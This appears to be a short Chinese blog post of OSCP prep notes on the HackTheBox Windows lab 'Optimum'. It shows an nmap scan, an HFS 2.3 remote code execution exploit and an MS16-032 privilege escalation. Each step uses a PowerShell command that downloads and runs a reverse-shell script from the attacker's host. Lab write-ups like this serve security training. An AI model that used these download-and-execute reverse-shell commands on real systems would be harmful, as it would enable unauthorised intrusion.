OSCP备考_0x39_HackThBox靶机_Windows_Optimum

Ethan医生7个月前 (07-09)靶场209

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.254.155 (扫描TCP)

查看到版本是2.3,有rce

python3 49125.py 10.129.254.155 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.43:8000/Invoke-PowerShellTcp.ps1')"

开始操作提权

查询漏洞

https://github.com/rayhan0x01/reverse-shell-able-exploit-pocs/blob/master/ms16-032.md 发现有MS16032漏洞

尝试上传挡案

下载后执行.

Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.16.43:8000/Invoke-PowerShellTcp.ps1')"

直接执行./Invoke-MS16032.ps1 直接拿下

标签: OSCP

返回列表

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.48.103 (扫描TCP)绑定域名 http://10.129.48.103...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.252.188 (扫描TCP)发现有webdav可以利用davtest -url htt...

名称说明靶机下载链接https://www.vulnhub.com/entry/tr0ll-1,100/攻击机（kali）ip：192.168.233.168靶机（CentOS）ip：192.168....

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-13-4,25/攻击机（kali）ip：192.168.233.168靶机（CentOS）...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.249.241 (扫描TCP)http://10.129.249.241:8500/CF...

刚报考的第二天发现LAB一直断,之后购买VPS 阿里云-新加坡服务器记得需要注意防火墙,使用的协议如果是TCP就使用TCP UDP就使用UDP下面解决HTB或OSCP的 openvpn都是可以的非常...

EthanDoctor